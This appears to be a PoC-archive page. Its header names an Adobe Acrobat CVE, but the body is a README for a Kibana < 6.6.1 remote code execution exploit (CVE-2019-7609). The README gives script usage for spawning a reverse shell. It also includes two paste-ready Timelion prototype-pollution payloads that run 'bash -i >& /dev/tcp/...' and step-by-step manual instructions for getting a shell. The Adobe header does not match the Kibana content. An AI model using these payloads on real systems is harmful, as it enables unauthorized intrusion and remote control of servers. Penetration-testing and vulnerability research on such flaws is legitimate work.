关联漏洞
标题:
Adobe Acrobat和Reader 代码问题漏洞
(CVE-2019-7069)
描述:Adobe Acrobat和Reader都是美国奥多比(Adobe)公司的产品。Acrobat是一套PDF文件编辑和转换工具。Reader是一套PDF文档阅读软件。 Adobe Acrobat和Reader中存在类型混淆漏洞。攻击者可利用该漏洞执行任意代码。基于Windows和macOS平台的以下产品和版本受到影响:Adobe Acrobat DC(Continuous )2019.010.20069及之前版本,Acrobat 2017(Classic 2017)2017.011.30113及之前版本,A
介绍
# Kibana < 6.6.1 Remote Code Execution Exploit (CVE-2019-7609)

## 🚨 Educational RCE Exploit 🚨
**Author:** LandGrey (Python3 Refactor by [Your Name])
**Reference:** [Exploit-DB 46651](https://www.exploit-db.com/exploits/46651)
**CVE:** [CVE-2019-7609](https://nvd.nist.gov/vuln/detail/CVE-2019-7609)
---
> **⚠️ Disclaimer:**
> This script is for **educational and authorized penetration testing** only. Do not use it on systems you do not own or have explicit permission to test. The author and contributors are not responsible for any misuse or damage caused by this tool.
---
## 🎯 What is this?
This is a Python 3 exploit script for the **Remote Code Execution vulnerability** in Kibana versions **< 6.6.1**. It leverages a prototype pollution flaw to execute arbitrary commands, including spawning a reverse shell, on a vulnerable Kibana instance.
## 🕹️ Features
- Detects Kibana version automatically
- Verifies vulnerability status
- Optionally triggers a reverse shell to your listener
- Clean, interactive terminal output
- Fully Python 3 compatible
## 📚 References
- [Exploit-DB Entry 46651](https://www.exploit-db.com/exploits/46651)
- [Kibana Official Site](https://www.elastic.co/kibana/)
- [CVE-2019-7609](https://nvd.nist.gov/vuln/detail/CVE-2019-7609)
## 🚀 Usage
```bash
python3 kibana_exploit.py -u http://target-kibana:5601
```
To trigger a reverse shell:
```bash
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT
```
### Example
```bash
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444
```
## 🛠️ Requirements
- Python 3.x
- `requests` library
- `packaging` library
Install dependencies with:
```bash
pip install requests packaging
```
---
## 💡 Manual Exploitation via Timelion
You can also exploit this vulnerability manually using Kibana's Timelion visualizer:
1. **Open Kibana**
2. **Paste one of the following payloads into the Timelion visualizer**
3. **Click Run**
4. **On the left panel, click on Canvas**
5. **Your reverse shell should pop! :)**
**Payload by [securityMB](https://github.com/securityMB):**
```
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```
**Payload by [chybeta](https://github.com/chybeta):**
```
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```
Replace `192.168.1.100` and `4444` with your own listener IP and port.
---
## 🧩 How it Works
- Detects the Kibana version via HTTP request
- Verifies if the target is vulnerable to CVE-2019-7609
- Exploits prototype pollution to execute arbitrary commands
- Optionally spawns a reverse shell to your specified host and port
## 🎨 Output
The script provides clear, step-by-step output for detection, verification, and exploitation, making it easy to follow and fun to use!
---
## 👾 For Fun & Learning
This script is a great way to learn about prototype pollution, remote code execution, and penetration testing techniques. Use it responsibly, and always with permission!
---
## 📝 License
This project is for educational use only. No warranty, no guarantees. Hack ethically, stay curious, and have fun!
文件快照
[4.0K] /data/pocs/1b198a807fc54dc11289eede3ab56c6a17c34e80
├── [4.7K] kibana_exploit.py
└── [3.6K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。